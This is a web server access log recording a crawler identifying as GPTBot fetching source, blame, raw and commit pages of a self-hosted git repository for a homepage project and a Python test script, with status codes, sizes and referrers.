like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/README.md" -[17/Feb/2026:13:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" -[17/Feb/2026:13:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 12481] [Gzip 5.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" -[17/Feb/2026:13:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 1336] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" -[17/Feb/2026:13:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 10756] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" -[17/Feb/2026:13:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" [Client 74.7.227.38] [Length 253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/.gitignore" -[17/Feb/2026:13:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" [Client 74.7.227.38] [Length 10804] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" -[17/Feb/2026:13:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets" [Client 74.7.227.38] [Length 9871] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets" -[17/Feb/2026:13:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/update_status.py" -[17/Feb/2026:13:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13901] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" -[17/Feb/2026:13:22:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services" -[17/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components" -[17/Feb/2026:13:22:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129.patch" [Client 74.7.227.38] [Length 1870] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/types.ts" -[17/Feb/2026:13:22:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" [Client 74.7.227.38] [Length 9876] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/App.tsx" -[17/Feb/2026:13:22:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 15338] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" -[17/Feb/2026:13:22:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 15322] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" -[17/Feb/2026:13:22:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15338] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" -[17/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16461] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" -[17/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15537] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" -[17/Feb/2026:13:22:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" -[17/Feb/2026:13:22:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13658] [Gzip 5.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Hero.tsx" -[17/Feb/2026:13:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14185] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" -[17/Feb/2026:13:22:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" [Client 74.7.227.38] [Length 14803] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" -[17/Feb/2026:13:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/html/index.tsx" -[17/Feb/2026:13:22:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11403] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest" -[17/Feb/2026:13:22:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 15339] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11403] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest" -[17/Feb/2026:13:22:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 15339] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" -[17/Feb/2026:13:22:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9874] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" -[17/Feb/2026:13:22:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16965] [Gzip 8.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" -[17/Feb/2026:13:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15895] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" -[17/Feb/2026:13:22:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9873] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" -[17/Feb/2026:13:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" -[17/Feb/2026:13:22:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14251] [Gzip 7.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" -[17/Feb/2026:13:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10465] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" -[17/Feb/2026:13:22:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9932] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" -[17/Feb/2026:13:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 9932] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" -[17/Feb/2026:13:22:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" [Client 74.7.227.38] [Length 14954] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" -[17/Feb/2026:13:22:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 15338] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a?show-outdated=&style=split&whitespace=ignore-all" -[17/Feb/2026:13:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/ChatBot.tsx" -[17/Feb/2026:13:22:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Footer.tsx" -[17/Feb/2026:13:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" -[17/Feb/2026:13:22:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Contact.tsx" -[17/Feb/2026:13:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" -[17/Feb/2026:13:22:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 265] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" -[17/Feb/2026:13:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 11403] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest" -[17/Feb/2026:13:22:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=PythonTest%2fimport%20sys.py" [Client 74.7.227.38] [Length 25217] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9374d883a61b35708b6c621337a654b11bcdb426/PythonTest/import%20sys.py" -[17/Feb/2026:13:22:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" [Client 74.7.227.38] [Length 10466] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" -[17/Feb/2026:13:22:42 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer" -[17/Feb/2026:13:22:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/" -[17/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm%2fdata" [Client 74.7.227.38] [Length 303075] [Gzip 13.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data" -[17/Feb/2026:13:22:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13869] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/components" -[17/Feb/2026:13:22:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components/Hero.tsx" [Client 74.7.227.38] [Length 13868] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/components" -[17/Feb/2026:13:22:45 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Header.tsx" 